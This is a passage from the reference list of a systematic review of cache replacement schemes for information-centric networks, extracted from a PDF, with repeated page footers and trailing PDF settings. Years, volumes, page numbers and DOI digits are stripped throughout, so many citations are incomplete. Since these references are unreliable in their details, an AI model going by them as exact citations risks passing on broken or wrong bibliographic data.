caching systems: modeling, design and experimental results. ieee journal on selected areas in communications ( ): – . chen b, liu l, zhang z, yang w, ma h. . brr-cvr: a collaborative caching strategy for information-centric wireless sensor networks. in: th international conference on mobile ad-hoc and sensor networks (msn). piscataway: ieee, – . chen m, mau do, zhang y, taleb t, leung vc. . vendnet: vehicular named data network. vehicular communications ( ): – . chen t, li h, an j, wang y, sun j, wang h. . the improved multi-attribute caching: an efficient cache strategy in ccn. in: ieee th international conference on communication software and networks (iccsn). piscataway: ieee, – . chen x, fan q, yin h. . caching in information-centric networking: from a content delivery path perspective. in: th international conference on innovations in information technology (iit), . piscataway: ieee, – . chootong s, thaenthong j. . cache replacement mechanism with content popularity for vehicular content-centric networks (vccn). in: th international joint conference on computer science and software engineering (jcsse). piscataway: ieee, – . chorley mj, colombo gb, allen sm, whitaker rm. . visiting patterns and personality of foursquare users. in: international conference on cloud and green computing. piscataway: ieee, – . compagno a, conti m, ghali c, tsudik g. . to nack or not to nack? negative acknowledgments in information-centric networking. in: th international conference on computer communication and networks (icccn). piscataway: ieee, – . compagno a, conti m, losiouk e, tsudik g, valle s. . a proactive cache privacy attack on ndn. in: noms - ieee/ifip network operations and management symposium. piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conti m, boldrini c, kanhere ss, mingozzi e, pagani e, ruiz pm, younis m. . from manet to people-centric networking: milestones and open research challenges. computer communications : – . dai h, liu b, yuan h, crowley p, lu j. . analysis of tandem pit and cs with non-zero download delay. in: infocom -ieee conference on computer communications. piscataway: ieee, – . de sousa am, araújo frc, sampaio ln. . a link-stability-based interest-forwarding strategy for vehicular named data networks. ieee internet computing ( ): – . dey ak. . understanding and using context. personal and ubiquitous computing ( ): – . dhiab i, barouni y, khalfallah s, slama jbh. . pseudo-lru replacement policy in named data networking using fat tree datacenter network architecture. in: ieee/acs th international conference on computer systems and applications (aiccsa). piscataway: ieee, – . din iu, hassan s, almogren a, ayub f, guizani m. . puc: packet update caching for energy efficient iot-based information-centric networking. future generation computer systems : – doi . /j.future. . . . din iu, hassan s, khan mk, guizani m, ghazali o, habbal a. . caching in information- centric networking: strategies, challenges, and future research directions. ieee communications surveys & tutorials ( ): – . dogruluk e, gama Ó, costa ad, macedo j. . public key certificate privacy in vondn: voice over named data networks. ieee access : – . dong l, wang g. . enhanced in-network capabilities of information-centric networks for emerging iot applications. in: ieee international conference on internet of things (ithings) and ieee green computing and communications (greencom) and ieee cyber, physical and social computing (cpscom) and ieee smart data (smartdata). piscataway: ieee, – . dron w, leung a, uddin m, wang s, abdelzaher t, govindan r, hancock j. . information-maximizing caching in ad hoc networks with named data networking. in: ieee nd network science workshop (nsw). piscataway: ieee, – . duan j, wang x, wang s, xu s. . profit-based caching for information-centric network. in: ieee th international conference on dependable, autonomic and secure computing (dasc). piscataway: ieee, – . elbamby ms, bennis m, saad w, latva-aho m. . content-aware user clustering and caching in wireless small cell networks. in: th international symposium on wireless communications systems (iswcs). piscataway: ieee, – . eum s, nakauchi k, murata m, shoji y, nishinaga n. . catt: potential based routing with content caching for icn. in: proceedings of the second edition of the icn workshop on information-centric networking. – . fan c, shannigrahi s, papadopoulos c, partridge c. . discovering in-network caching policies in ndn networks from a measurement perspective. in: proceedings of the th acm conference on information-centric networking. – . fang c, yu fr, huang t, liu j, liu y. . a survey of energy-efficient caching in information- centric networking. ieee communications magazine ( ): – . fang c, yu fr, huang t, liu j, liu y. . a survey of green information-centric networking: research issues and challenges. ieee communications surveys & tutorials ( ): – . fricker c, robert p, roberts j. a. a versatile and accurate approximation for lru cache performance. in: th international teletraffic congress (itc ). piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fricker c, robert p, roberts j, sbihi n. b. impact of traffic mix on caching performance in a content-centric network. in: proceedings ieee infocom workshops. piscataway: ieee, – . gallo m, kauffmann b, muscariello l, simonian a, tanguy c. . performance evaluation of the random replacement policy for networks of caches. performance evaluation : – . garca g, beben a, ramón fj, maeso a, psaras i, pavlou g, wang n, Śliwiński j, spirou s, soursos s, hadjioannou e. . comet: content mediator architecture for content-aware networks. in: future network & mobile summit. piscataway: ieee, – . garetto m, leonardi e, martina v. . a unified approach to the performance analysis of caching systems. acm transactions on modeling and performance evaluation of computing systems ( ): . ge c, wang n, skillman s, foster g, cao y. . qoe-driven dash video caching and adaptation at g mobile edge. in: proceedings of the rd acm conference on information-centric networking. new york: acm, – . ghahfarokhi bs, moghim n, eftekhari s. . reducing channel zapping time in live tv broadcasting over content centric networks. multimedia tools and applications ( ): – . gomaa h, messier gg, williamson c, davies r. . estimating instantaneous cache hit ratio using markov chain analysis. ieee/acm transactions on networking ( ): – . gür g. . energy-aware cache management at the wireless network edge for information- centric operation. journal of network and computer applications : – . hahm o, baccelli e, schmidt t, waehlisch m, adjih c. . a named data network approach to energy efficiency in iot. in: ieee globecom workshop on named data networking for challenged communication environments. piscataway: ieee. han b, wang x, chen x, kwon tt, choi y, mau do, chen m. . ppp: prefix-based popularity prediction for effective caching in content-centric networking. in: proceedings of the ninth international conference on future internet technologies. acm, . he s, wang t, wang s. . mobility-driven user-centric ap clustering in mobile edge computing based ultra dense networks. digital communications and networks ( ): – doi . /j.dcan. . . . hou r, zhang l, wu t, mao t, luo j. . bloom-filter-based request node collaboration caching for named data networking. cluster computing ( ): – . hu x, gong j, cheng g, fan c. . enhancing in-network caching by coupling cache placement, replacement and location. in: ieee international conference on communications (icc). piscataway: ieee, – . huang l, guan y, zhang x, guo z. . on-path collaborative in-network caching for information-centric networks. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee, – . huang s, zeng z, ota k, dong m, wang t, xiong n. . an intelligent collaboration trust interconnections system for mobile information control in ubiquitous g networks. ieee transactions on network science and engineering : . huang w, song t, yang y, zhang y. . cluster-based selective cooperative caching strategy in vehicular named data networking. in: st ieee international conference on hot information-centric networking (hoticn). piscataway: ieee, – . ioannidis s, yeh e. . adaptive caching networks with optimality guarantees. in: acm sigmetrics performance evaluation review. vol. , acm, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.dcan. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ioannidis s, yeh e. . adaptive caching networks with optimality guarantees. ieee/acm transactions on networking ( ): – . ioannou a, weber s. . a survey of caching policies and forwarding mechanisms in information-centric networking. ieee communications surveys & tutorials ( ): – . jeon h, lee b, song h. . on-path caching in information-centric networking. in: th international conference on advanced communications technology (icact). ieee, – . ji j, zhu k, niyato d, wang r. . probabilistic cache placement in uav-assisted networks with d d connections: performance analysis and trajectory optimization. ieee transactions on communications ( ): – . jia r, liu z, wang x, gan x, wang x, xu jj. . modeling dynamic adaptive streaming over information-centric networking. ieee access : – . jiang s, zhang xf. . lirs: an efficient low inter-reference recency set replacement to improve buffer cache performance. acm sigmetrics performance evaluation review ( ): – . jin h, xu d, zhao c, liang d. . information-centric mobile caching network frameworks and caching optimization: a survey. eurasip journal on wireless communications and networking ( ): . jin s, bestavros a. . temporal locality in web request streams-sources, characteristics, and caching implications. in: proceedings of sigmetrics. johnson t, shasha d. . q: a low overhead high performance buffer management replacement algoritm. in: proceedings of the twentieth international conference on very large databases, santiago, chile. – . kalghoum a, gammar sm. . towards new information centric networking strategy based on software defined networking. in: ieee wireless communications and networking conference (wcnc). piscataway: ieee, – . kalghoum a, gammar sm, saidane la. . towards a novel cache replacement strategy for named data networking based on software defined networking. computers & electrical engineering : – . kalghoum a, saidane la. . fcr-ns: a novel caching and forwarding strategy for named data networking based on software defined networking. cluster computing ( ): – . kang s-j, lee s-w, ko y-b. . a recent popularity based dynamic cache management for content centric networking. in: fourth international conference on ubiquitous and future networks (icufn). piscataway: ieee, – . karami a, guerrero-zapata m. . an anfis-based cache replacement method for mitigating cache pollution attacks in named data networking. computer networks : – . khan fh, khan z. . popularity-aware content caching for distributed wireless helper nodes. arabian journal for science and engineering ( ): – . khan j, westphal c, garcia-luna-aceves j, ghamri-doudane y. . nice: network-oriented information-centric centrality for efficiency in cache management. in: icn ’ : proceedings of the th acm conference on information-centric networking. new york: acm, – . khelifi h, luo s, nour b, moungla h, faheem y, hussain r, ksentini a. . named data networking in vehicular ad hoc networks: state-of-the-art and challenges. ieee communications surveys & tutorials ( ): – doi . /comst. . . kim w-s, chung s-h, moon j-w. . improved content management for information-centric networking in sdn-based wireless mesh network. computer networks : – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kitchenham b, charters s. . guidelines for performing systematic literature reviews in software engineering. technical report, ver. . , ebse technical report ebse- - . available at https://www.elsevier.com/__data/promis_misc/ systematicreviewsguide.pdf. koponen t, chawla m, chun b-g, ermolinskiy a, kim kh, shenker s, stoica i. . a data-oriented (and beyond) network architecture. in: proceedings of the conference on applications, technologies, architectures, and protocols for computer communications. – . lal kn, kumar a. . a cache content replacement scheme for information centric network. procedia computer science : – . lal kn, kumar a. . a popularity based content eviction scheme via betweenness-centrality caching approach for content-centric networking (ccn). wireless networks ( ): – . laoutaris n, syntila s, stavrakakis i. . meta algorithms for hierarchical web caches. in: ieee international conference on performance, computing, and communications. piscataway: ieee, – . lee d, choi j, kim j-h, noh sh, min sl, cho y, kim cs. . lrfu: a spectrum of policies that subsumes the least recently used and least frequently used policies. ieee transactions on computers : – . lee j, lim k, yoo c. . cache replacement strategies for scalable video streaming in ccn. in: th asia-pacific conference on communications (apcc). piscataway: ieee, – . lee jw, hong cs. . fera: a caching scheme in ccn using file-extension and regression analysis. in: network operations and management symposium (apnoms), th asia-pacific. piscataway: ieee, – . li b, ma m, hu s. a. perceptive forwarding strategy in content-centric network. in: ieee globecom workshops (gc wkshps). piscataway: ieee, – . li h, nakazato h, detti a, melazzi nb. b. popularity proportional cache size allocation policy for video delivery on ccn. in: european conference on networks and communications (eucnc). piscataway: ieee, – . li j, liu b, wu h. . energy-efficient in-network caching for content-centric networking. ieee communications letters ( ): – . li j, luo h, zhang s, li h, yan f. . design and implementation of efficient control for incoming inter-domain traffic with information-centric networking. journal of network and computer applications : – . li t, liu a, xiong n, zhang s, wang t. a. a trustworthiness-based vehicular recruitment scheme for information collections in distributed networked systems. information sciences : – . li t, zhao m, wong k. b. machine learning based code dissemination by selection of reliability mobile vehicles in g networks. computer communications : – doi . /j.comcom. . . . li y, yu m, li r. . a cache replacement strategy based on hierarchical popularity in ndn. in: tenth international conference on ubiquitous and future networks (icufn). piscataway: ieee, – . li z, simon g, gravey a. . caching policies for in-network caching. in: st international conference on computer communications and networks (icccn). piscataway: ieee, – . liang c, yu fr, zhang x. . information-centric network function virtualization over g mobile wireless networks. ieee network ( ): – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.elsevier.com/__data/promis_misc/ systematicreviewsguide.pdf http://dx.doi.org/ . /j.comcom. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ liang y, zhou x, guo b, yu z. . understanding the regularity and variability of human mobility from geo-trajectory. in: ieee/wic/acm international conferences on web intelligence and intelligent agent technology. piscataway: ieee, – . liu h, azhandeh k, de foy x, gazda r. a. a comparative study of name resolution and routing mechanisms in information-centric networks. digital communications and networks ( ): – . liu w, li x, huang d. . a survey on context awareness. in: international conference on computer science and service system (csss). piscataway: ieee, – . liu w-x, zhang j, liang z-w, peng l-x, cai j. . content popularity prediction and caching for icn: a deep learning approach with sdn. ieee access : – . liu y, zhi t, xi h, quan w, zhang h. b. a novel cache replacement scheme against cache pollution attack in content-centric networks. in: ieee/cic international conference on communications in china (iccc). piscataway: ieee, – . liu y, zhu d, ma w. . a novel cooperative caching scheme for content centric mobile ad hoc networks. in: ieee symposium on computers and communication (iscc). piscataway: ieee, – . liu z, dong m, gu b, zhang c, ji y, tanaka y. . fast-start video delivery in future internet architectures with intra-domain caching. mobile networks and applications ( ): – . llorca j, tulino am, varvello m, esteban jo, perino d. . energy efficient dynamic content distribution. ieee journal on selected areas in communications ( ): – . madureira alr, araújo frc, araújo gb, sampaio ln. . ndn fabric: where the software- defined networking meets the content-centric model. ieee transactions on network and service management : . mangili m, martignon f, capone a. . a comparative study of content-centric and content- distribution networks: performance and bounds. in: ieee global communications conference (globecom). piscataway: ieee, – . meddeb m, dhraief a, belghith a, monteil t, drira k. . how to cache in icn-based iot environments? in: ieee/acs th international conference on computer systems and applications (aiccsa). piscataway: ieee, – . meddeb m, dhraief a, belghith a, monteil t, drira k, mathkour h. . least fresh first cache replacement policy for ndn-based iot networks. pervasive and mobile computing : – . megiddo n, modha ds. . arc: a self-tuning, low overhead replacement cache. in: fast, : – . megiddo n, modha ds. . outperforming lru with an adaptive replacement cache algorithm. computer ( ): – . melazzi nb, bianchi g, caponi a, detti a. . a general, tractable and accurate model for a cascade of lru caches. ieee communications letters ( ): – . mick t, tourani r, misra s. . muncc: multi-hop neighborhood collaborative caching in information centric networks. in: proceedings of the rd acm conference on information- centric networking. new york: acm, – . ming z, xu m, wang d. . age-based cooperative caching in information-centric networks. in: proceedings ieee infocom workshops. ieee, – . moon c, han s, woo h, kim d. . named data networking for infrastructure wireless networks. in: ieee international conference on consumer electronics (icce). piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nakayama h, ata s, oka i. . caching algorithm for content-oriented networks using prediction of popularity of contents. in: ifip/ieee international symposium on integrated network management (im). piscataway: ieee, – . naz s, rais rnb, qayyum a. . multi-attribute caching: towards efficient cache management in content-centric networks. in: th ieee annual consumer communications & networking conference (ccnc). piscataway: ieee, – . ndikumana a, tran nh, ho tm, niyato d, han z, hong cs. . joint incentive mechanism for paid content caching and price based cache replacement policy in named data networking. ieee access : – . neves dos santos f, ertl b, barakat c, spyropoulos t, turletti t. . cedo: content-centric dissemination algorithm for delay-tolerant networks. in: proceedings of the th acm international conference on modeling, analysis & simulation of wireless and mobile systems. new york: acm, – . newberry e, zhang b. . on the power of in-network caching in the hadoop distributed file system. in: proceedings of the th acm conference on information-centric networking, – . o’neil ej, o’neil pe, weikum g. . the lru-k page replacement algorithm for database disk buffering. acm sigmod record ( ): – . ong md, chen m, taleb t, wang x, leung v. . fgpc: fine-grained popularity-based caching design for content centric networking. in: proceedings of the th acm international conference on modeling, analysis and simulation of wireless and mobile systems. new york: acm, – . ostrovskaya s, surnin o, hussain r, bouk sh, lee j, mehran n, ahmed sh, benslimane a. . towards multi-metric cache replacement policies in vehicular named data networks. in: ieee th annual international symposium on personal, indoor and mobile radio communications (pimrc). piscataway: ieee, – . pacifici v, dán g. . content-peering dynamics of autonomous caches in a content-centric network. in: proceedings ieee infocom. piscataway: ieee, – . pal a, kant k. . nacid: a neighborhood aware caching and interest dissemination in content centric networks. in: th international conference on computer communication and networks (icccn). piscataway: ieee, – . pan t, huang t, li c. . modeling ccn packet forwarding engine. in: globecom - ieee global communications conference. piscataway: ieee, – . pan t, lin x, zhang j, li h, lv j, huang t, liu b, zhang b. . nb-cache: non-blocking in- network caching for high-speed content routers. in: proceedings of the international symposium on quality of service. – . panda p, patil g, raveendran b. . a survey on replacement strategies in cache memory for embedded systems. in: ieee distributed computing, vlsi, electrical circuits and robotics (discover). piscataway: ieee, – . panigrahi b, shailendra s, rath hk, simha a. . universal caching model and markov-based cache analysis for information centric networks. in: ieee international conference on advanced networks and telecommuncations systems (ants). piscataway: ieee, – . pentikousis k, ohlman b, corujo d, boggia g, tyson g, davies eb, molinaro a, eum s. . information-centric networking: baseline scenarios. rfc . perera c, zaslavsky a, christen p, georgakopoulos d. . context aware computing for the internet of things: a survey. ieee communications surveys & tutorials ( ): – . petersen k, feldt r, mujtaba s, mattsson m. . systematic mapping studies in software engineering. in: ease, : – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pires ss, ribeiro av, de sousa am, freitas ae, sampaio ln. . on evaluating the influence of user’s music listening habits on cache replacement policies. in: ieee symposium on computers and communications (iscc). piscataway: ieee, – . podlipnig s, böszörmenyi l. . a survey of web cache replacement strategies. acm computing surveys ( ): – . psaras i, ascigil o, rene s, pavlou g, afanasyev a, zhang l. . mobile data repositories at the edge. in: {usenix} workshop on hot topics in edge computing (hotedge ). psaras i, chai wk, pavlou g. . probabilistic in-network caching for information-centric networks. in: proceedings of the second edition of the icn workshop on information-centric networking. – . qian h, muqing w, dongyang w, song g. . lifetime-based greedy caching approach for content-centric networking. in: st international conference on telecommunications (ict). piscataway: ieee, – . qu d, wang x, huang m, li k, das sk, wu s. . a cache-aware social-based qos routing scheme in information centric networks. journal of network and computer applications : – . quevedo j, corujo d, aguiar r. . a case for icn usage in iot environments. in: ieee global communications conference. piscataway: ieee, – . rahman a, trossen d, kutscher d, ravindran r. . deployment considerations for information-centric networking (icn). rfc . available at https://rfc-editor.org/rfc/rfc .txt. ran j, lv n, zhang d, yuan ma y, yong xie z. . on performance of cache policies in named data networking. in: international conference on advanced computer science and electronics information (icacsei ). paris: atlantis press. rao a, schelen o, lindgren a. . performance implications for iot over information centric networks. in: proceedings of the eleventh acm workshop on challenged networks. new york: acm, – . rath hk, panigrahi b, simha a. . on cooperative on-path and off-path caching policy for information centric networks (icn). in: ieee th international conference on advanced information networking and applications (aina). piscataway: ieee, – . ravi a, ramanathan p, sivalingam km. . integrated network coding and caching in information-centric networks. in: ieee international conference on advanced networks and telecommuncations systems (ants). piscataway: ieee, – . raychaudhuri d, nagaraja k, venkataramani a. . mobilityfirst: a robust and trustworthy mobility-centric architecture for the future internet. acm sigmobile mobile computing and communications review ( ): – . ren j, qi w, westphal c, wang j, lu k, liu s, wang s. . magic: a distributed max-gain in- network caching strategy in information-centric networks. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee, – . rezazad m, tay y. . ccndns: a strategy for spreading content and decoupling ndn caches. in: ifip networking conference (ifip networking). piscataway: ieee, – . rhaiem ob, fourati lc, ajib w. . new hierarchical parent-child caching strategy (h-cs) for ccn-based video streaming. in: ieee th international conference on advanced information networking and applications (aina). piscataway: ieee, – . ribeiro av, sampaio ln, ziviani a. . affinity-based user clustering for efficient edge caching in content-centric cellular networks. in: ieee symposium on computers and communications (iscc). piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://rfc-editor.org/rfc/rfc .txt http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rocha aa, dehghan m, salonidis t, he t, towsley d. . dsca: a data stream caching algorithm. in: proceedings of the st workshop on content caching and delivery in wireless networks. new york: acm, . rosário d, seruffo m, cerqueira e, both c, braun t, gerla m. . trends in human-centric multimedia networking scenarios. in: mediterranean ad hoc networking workshop (med- hoc-net). piscataway: ieee, – . rossi d, rossini g. . caching performance of content centric networks under multi-path routing (and more). relatório técnico, telecom paristech, – . available at https://perso.telecom- paristech.fr/drossi/paper/rossi ccn-techrep .pdf. saadeh h, almobaideen w, sabri ke, saadeh m. . hybrid sdn-icn architecture design for the internet of things. in: sixth international conference on software defined systems (sds). piscataway: ieee, – . sadeghi a, sheikholeslami f, giannakis gb. . optimal and scalable caching for g using reinforcement learning of space-time popularities. ieee journal of selected topics in signal processing ( ): – . safavat s, naveen nns, rawat db. . recent advances in mobile edge computing and content caching. digital communications and networks ( ): – . saltarin j, braun t, bourtsoulatze e, thomos n. . popnetcod: a popularity-based caching policy for network coding enabled named data networking. in: ifip networking conference (ifip networking) and workshops. piscataway: ieee, – . saxena d, raychoudhury v, suri n, becker c, cao j. . named data networking: a survey. computer science review : – . sertbaş n, aytaç s, ermiş o, alagöz f, gür g. . attribute based content security and caching in information centric iot. in: proceedings of the th international conference on availability, reliability and security. new york: acm, . shafigh as, glisic s, hossain e, lorenzo b, dasilva la. . user-centric distributed spectrum sharing in dynamic network architectures. ieee/acm transactions on networking ( ): – . shailendra s, sengottuvelan s, rath hk, panigrahi b, simha a. . performance evaluation of caching policies in ndn-an icn architecture. in: ieee region conference (tencon). piscataway: ieee, – . shariat a, tizghadam a, leon-garcia a. . an icn-based publish-subscribe platform to deliver uav service in smart cities. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee, – . shukla s, abouzeid aa. . optimal device-aware caching. ieee transactions on mobile computing ( ): – . sinky h, khalfi b, hamdaoui b, rayes a. . responsive content-centric delivery in large urban communication networks: a linknyc use-case. ieee transactions on wireless communications ( ): – . sri prakash r, moharir s. . poster: caching static and transient data. in: proceedings of the th annual international conference on mobile computing and networking. acm, – . sun x, wang z. . an optimized cache replacement algorithm for information-centric networks. in: ieee international conference on smart city/socialcom/sustaincom (smartcity). piscataway: ieee, – . sun y, fayaz sk, guo y, sekar v, jin y, kaafar ma, uhlig s. . trace-driven analysis of icn caching algorithms on video-on-demand workloads. in: proceedings of the th acm international on conference on emerging networking experiments and technologies. new york: acm, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://perso.telecom-paristech.fr/drossi/paper/rossi ccn-techrep .pdf https://perso.telecom-paristech.fr/drossi/paper/rossi ccn-techrep .pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sung j, kim k, kim j, rhee j-kk. . efficient content replacement in wireless content delivery network with cooperative caching. in: th ieee international conference on machine learning and applications (icmla). piscataway: ieee, – . sureshjani mh, moghim n. . cache replacement policy discard of fast retrievable content in named data networking of things. in: proceedings of the international conference on smart cities and internet of things. new york: acm, . tang y, guo k, ma j, shen y, chi t. . a smart caching mechanism for mobile multimedia in information centric networking with edge computing. future generation computer systems : – . tarnoi s, kumwilaisak w, suppakitpaisarn v, fukuda k, ji y. . adaptive probabilistic caching technique for caching networks with dynamic content popularity. computer communications : – . tarnoi s, suksomboon k, kumwilaisak w, ji y. . performance of probabilistic caching and cache replacement policies for content-centric networks. in: th annual ieee conference on local computer networks. piscataway: ieee, – . tarnoi s, suppakitpaisarn v, kumwilaisak w, ji y. . performance analysis of probabilistic caching scheme using markov chains. in: ieee th conference on local computer networks (lcn). piscataway: ieee, – . thomas y, xylomenos g. . towards improving the efficiency of icn packet-caches. in: th international conference on heterogeneous networking for quality, reliability, security and robustness (qshine). piscataway: ieee, – . tyson g, sastry n, rimac i, cuevas r, mauthe a. . a survey of mobility in information- centric networks: challenges and research directions. in: proceedings of the st acm workshop on emerging name-oriented mobile networking design-architecture, algorithms, and applications. new york: acm, – . van adrichem nl, kuipers fa. . globally accessible names in named data networking. in: ieee conference on computer communications workshops (infocom wkshps). piscataway: ieee, – . van engelenburg s, janssen m, klievink b. . designing context-aware systems: a method for understanding and analysing context in practice. journal of logical and algebraic methods in programming : – . vieira v, tedesco p, salgado ac. . designing context-sensitive systems: an integrated approach. expert systems with applications ( ): – . vural s, wang n, navaratnam p, tafazolli r. . caching transient data in internet content routers. ieee/acm transactions on networking ( ): – . wang g-q, huang t, jiang l, xie r-c, liu y-j. a. in-network caching for energy efficiency in content-centric networking. journal of china universities of posts and telecommunications ( ): – . wang h, chen z, xie f, han f. a. a data structure for content cache management in content-centric networking. in: third international conference on networking and distributed computing (icndc). piscataway: ieee, – . wang j. . a survey of web caching schemes for the internet. acm sigcomm computer communication review ( ): – . wang jm, bensaou b. a. improving content-centric networks performance with progressive, diversity-load driven caching. in: st ieee international conference on communications in china (iccc). piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wang jm, bensaou b. b. progressive caching in ccn. in: ieee global communications conference (globecom). piscataway: ieee, – . wang l, bayhan s, kangasharju j. . optimal chunking and partial caching in information- centric networks. computer communications : – . wang s, bi j, wu j. b. on performance of cache policy in information-centric networking. in: st international conference on computer communications and networks (icccn). piscataway: ieee, – . wang s, bi j, wu j, li z, zhang w, yang x. . could in-network caching benefit information- centric networking? in: proceedings of the th asian internet engineering conference. new york: acm, – . wang w, sun y, guo y, kaafar d, jin j, li j, li z. b. crcache: exploiting the correlation between content popularity and network topology information for icn caching. in: ieee international conference on communications (icc). piscataway: ieee, – . wei t, chang l, yu b, pan j. . mpcs: a mobility/popularity-based caching strategy for information-centric networks. in: ieee global communications conference (globecom). piscataway: ieee, – . williamson c. . on filter effects in web caching hierarchies. acm transactions on internet technology (toit) ( ): – . wood s, mathewson j, joy j, stehr m-o, kim m, gehani a, gerla m, sadjadpour h, garcia-luna-aceves j. . iceman: a system for efficient, robust and secure situational awareness at the network edge. in: milcom - ieee military communications conference. piscataway: ieee, – . wu t-y, lee w-t, duan c-y, wu y-w. . data lifetime enhancement for improving qos in ndn. procedia computer science : – . xin y, li y, wang w, li w, chen x. . content aware multi-path forwarding strategy in information centric networking. in: ieee symposium on computers and communication (iscc). piscataway: ieee, – . xing l, zhang z, lin h, gao f. . content centric network with label aided user modeling and cellular partition. ieee access : – . xylomenos g, ververidis cn, siris va, fotiou n, tsilopoulos c, vasilakos x, katsaros kv, polyzos gc. . a survey of information-centric networking research. ieee communications surveys & tutorials ( ): – . yang j-y, choi h-k. . ppndn: popularity-based caching for privacy preserving in named data networking. in: ieee/acis th international conference on computer and information science (icis). piscataway: ieee, – . yanuar mr, manaf a. . performance evaluation of progressive caching policy on ndn. in: international conference on advanced informatics, concepts, theory, and applications (icaicta). piscataway: ieee, – . yao h, qiu c, fang c, chen x, yu fr. . a novel framework of data-driven networking. ieee access : – . yao l, chen a, deng j, wang j, wu g. . a cooperative caching scheme based on mobility prediction in vehicular content centric networks. ieee transactions on vehicular technology ( ): – . yao l, wang y, xia q, xu r. . popularity prediction caching using hidden markov model for vehicular content centric networks. in: th ieee international conference on mobile data management (mdm). piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ yeh e, ho t, cui y, burd m, liu r, leong d. . vip: joint traffic engineering and caching in named data networks. in: international conference on computing, networking and communications (icnc). piscataway: ieee, – . yokota k, sugiyama k, kurihara j, tagami a. . rtt-based caching policies to improve user- centric performance in ccn. in: ieee th international conference on advanced information networking and applications (aina). ieee, – . zaidi s, ben smida o, affes s, vilaipornsawai u, zhang l, zhu p. . user-centric base- station wireless access virtualization for future g networks. ieee transactions on communications ( ): – . zeng y, xie j, jiang h, huang g, yi s, xiong n, li j. . smart caching based on user behavior for mobile edge computing. information sciences : – . zhang l, estrin d, burke j, jacobson v, thorton jd, smetters dk, zhang b, tsudik g, claffy kc, krioukov d, massey d, papadopoulos c, abdelzaher t, wang l, crowley p, yeh e. . named data networking (ndn) project. available at https://named-data.net/ techreport/tr ndn-proj.pdf. zhang g, li y, lin t. . caching in information centric networking: a survey. computer networks ( ): – . zhang g, liu j, chang x, chen z. a. combining popularity and locality to enhance in- network caching performance and mitigate pollution attacks in content-centric networking. ieee access : – . zhang h, xie r, zhu s, huang t, liu y. . dena: an intelligent content discovery system used in named data networking. ieee access : – . zhang l, afanasyev a, burke j, jacobson v, claffy kc, crowley p, papadopoulos c, wang l, zhang b. . named data networking. acm sigcomm computer communication review ( ): – . zhang m, luo h, zhang h. . a survey of caching mechanisms in information-centric networking. ieee communications surveys & tutorials ( ): – . zhang q, wang x, huang m, li k, das sk. . software defined networking meets information centric networking: a survey. ieee access : – . zhang t, wang z, liu y, xu w, nallanathan a. . caching placement and resource allocation for cache-enabling uav noma networks. ieee transactions on vehicular technology ( ): – . zhang y, tan x, li w. b. in-network cache size allocation for video streaming on named data networking. in: proceedings of the vi international conference on network, communication and computing. new york: acm, – . zhang y, tan x, li w. . ppc: popularity prediction caching in icn. ieee communications letters ( ): – . zhang z, lung c-h, lambadaris i, st-hilaire m. . when g meets icn: an icn-based caching approach for mobile video in g networks. computer communications : – . zhang z, ma h, xue y, liu l. c. fair video caching for named data networking. in: ieee international conference on communications (icc). piscataway: ieee, – . zhao w, qin y, gao d, foh ch, chao h-c. . an efficient cache strategy in information centric networking vehicle-to-vehicle scenario. ieee access : – . zhou x, ye z. . popularity and age based cache scheme for content-centric network. in: rd international conference on information management (icim). piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://named-data.net/techreport/tr ndn-proj.pdf https://named-data.net/techreport/tr ndn-proj.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ zhou y, cui l, jiang y, xu m. . modeling and optimizing the cache deployment with filter effect in multi-cache system. in: ieee symposium on computers and communications (iscc). piscataway: ieee, – . zhou y, philbin j, li k. . the multi-queue replacement algorithm for second level buffer caches. in: usenix annual technical conference, general track. – . zhou y, yu fr, chen j, kuo y. . resource allocation for information-centric virtualized heterogeneous networks with in-network caching and mobile edge computing ieee transactions on vehicular technology ( ): – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ contextual dimensions for cache replacement schemes in information-centric networks: a systematic review introduction background systematic literature review methodology results and analysis applications research directions conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false 